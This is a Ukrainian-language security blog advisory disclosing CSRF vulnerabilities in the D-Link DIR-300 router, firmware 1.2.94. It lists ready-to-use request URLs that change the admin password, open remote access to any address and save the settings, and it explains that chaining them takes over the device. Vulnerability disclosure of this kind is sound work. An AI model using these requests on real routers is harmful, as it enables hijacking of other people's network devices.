CSRF уразливості в D-Link DIR-300

16:28 30.09.2017

17.03.2016

У січні, 29.01.2015, я виявив Cross-Site Request Forgery уразливості в D-Link DIR-300. Це Wireless Router і AP.

Раніше я писав про уразливості в пристроях даної компанії, зокрема в D-Link DIR-300 та D-Link DGS-3200-16.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам пристрою.

30.09.2017

Після попередніх AoF, BF та CSRF уразливостей, тримайте нові Cross-Site Request Forgery дірки. Для захоплення контролю над пристроєм потрібно зробити декілька CSRF запитів: змінити пароль, логін при цьому фіксований (це раніше згадана AoF уразливість), увімкнути віддалений доступ та зберегти налаштування.

Cross-Site Request Forgery (WASC-09):

Зміна паролю адміна:

http://site/index.cgi?v2=y&rq=y&res_config_action=3&res_config_id=69&res_struct_size=1&res_buf=password|

Додати налаштування для увімкнення віддаленого доступу:

http://site/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=16&res_struct_size=0&res_buf={%22ips%22:%220.0.0.0%22,%22source_mask%22:%220.0.0.0%22,%22sport%22:80,%22dport%22:%2280%22}&res_pos=-1

Зміна налаштування для увімкнення віддаленого доступу:

http://site/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=16&res_struct_size=0&res_buf={%22ips%22:%220.0.0.0%22,%22source_mask%22:%220.0.0.0%22,%22sport%22:80,%22dport%22:%2280%22}&res_pos=1

Видалення налаштування віддаленого доступу:

http://site/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=2&res_config_id=16&res_struct_size=0&res_pos=1

Збереження всіх змінених налаштувань пристрою:

http://site/index.cgi?res_cmd=20&res_buf=null&res_cmd_type=bl&v2=y&rq=y

Уразлива версія D-Link DIR-300NRUB5, Firmware 1.2.94. Дана модель з іншими прошивками також повинна бути вразливою.


Leave a Reply

You must be logged in to post a comment.